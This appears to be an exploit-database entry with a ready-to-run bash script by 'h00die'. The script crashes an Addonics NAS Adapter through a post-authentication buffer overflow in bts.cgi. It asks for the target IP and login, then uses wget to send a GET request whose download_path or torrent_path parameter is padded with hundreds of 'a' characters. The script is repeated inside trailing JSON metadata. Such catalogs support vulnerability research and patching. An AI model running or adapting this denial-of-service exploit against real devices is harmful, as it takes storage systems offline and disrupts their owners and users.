ID 1337DAY-ID-6834
Type zdt
Reporter h00die
Modified 2009-04-20T00:00:00
Description
Exploit for hardware platform in category dos / poc
=============================================================
Addonics NAS Adapter (bts.cgi) Remote DoS Exploit (post-auth)
=============================================================
#!/bin/bash
######################################################
# Addonics NAS Adapter bts.cgi Post-Auth DoS
# Tested against NASU2FW41 Loader 1.17
# Coded by Mike Cyr, aka h00die
# Notes: Any of these BoF crashes the entire stack from the web GUI
# so throw a GET, and bye bye baby!
# Greetz to muts and loganWHD, I tried harder
######################################################
echo "Addonics NAS Adapter bts.cgi Post-Auth DoS"
echo "Written by H00die"
echo "------------------------"
echo "Addonics IP:"
read -e IP
echo "Addonics GUI Username:"
read -e USERNAME
echo "Addonics GUI Password:"
read -e PASSWORD
echo "-----------------------"
echo "Select Buffer:"
echo "1. BT Download Path"
echo "2. BT Torrent Path (only works with a drive attached)"
read -e BOF
echo ""
echo "-----------------------"
echo "Sending Malicious GET request"
case "$BOF" in
'1')
wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/bts.cgi?redirect=bt.htm&failure=fail.htm&type=bt_search_apply&torrent_path=&download_path=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
;;
'2')
wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/bts.cgi?redirect=bt.htm&failure=fail.htm&type=bt_search_apply&torrent_path=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&download_path=PUBLIC"
;;
esac
echo "Stack Smashed..."
# 0day.today [2018-03-05] #
{"id": "1337DAY-ID-6834", "lastseen": "2018-03-05T21:39:16", "viewCount": 3, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2018-03-05T21:39:16", "rev": 2}, "dependencies": {"references": [], "modified": "2018-03-05T21:39:16", "rev": 2}, "vulnersScore": -0.2}, "type": "zdt", "sourceHref": "https://0day.today/exploit/6834", "description": "Exploit for hardware platform in category dos / poc", "title": "Addonics NAS Adapter (bts.cgi) Remote DoS Exploit (post-auth)", "cvelist": [], "sourceData": "=============================================================\r\nAddonics NAS Adapter (bts.cgi) Remote DoS Exploit (post-auth)\r\n=============================================================\r\n\r\n\r\n\r\n\r\n\r\n#!/bin/bash\r\n######################################################\r\n# Addonics NAS Adapter bts.cgi Post-Auth DoS\r\n# Tested against NASU2FW41 Loader 1.17\r\n# Coded by Mike Cyr, aka h00die\r\n# Notes: Any of these BoF crashes the entire stack from the web GUI\r\n# so throw a GET, and bye bye baby!\r\n# Greetz to muts and loganWHD, I tried harder\r\n######################################################\r\n\r\necho \"Addonics NAS Adapter bts.cgi Post-Auth DoS\"\r\necho \"Written by H00die\"\r\n\r\necho \"------------------------\"\r\necho \"Addonics IP:\"\r\nread -e IP\r\necho \"Addonics GUI Username:\"\r\nread -e USERNAME\r\necho \"Addonics GUI Password:\"\r\nread -e PASSWORD\r\n\r\necho \"-----------------------\"\r\necho \"Select Buffer:\"\r\necho \"1. BT Download Path\"\r\necho \"2. BT Torrent Path (only works with a drive attached)\"\r\n\r\nread -e BOF\r\n\r\necho \"\"\r\necho \"-----------------------\"\r\necho \"Sending Malicious GET request\"\r\ncase \"$BOF\" in\r\n'1')\r\nwget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD \"http://$IP/bts.cgi?redirect=bt.htm&failure=fail.htm&type=bt_search_apply&torrent_path=&download_path=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\"\r\n;;\r\n'2')\r\nwget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD \"http://$IP/bts.cgi?redirect=bt.htm&failure=fail.htm&type=bt_search_apply&torrent_path=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&download_path=PUBLIC\"\r\n;;\r\nesac\r\n\r\necho \"Stack Smashed...\"\r\n\r\n\r\n\n# 0day.today [2018-03-05] #", "published": "2009-04-20T00:00:00", "references": [], "reporter": "h00die", "modified": "2009-04-20T00:00:00", "href": "https://0day.today/exploit/description/6834"}
{}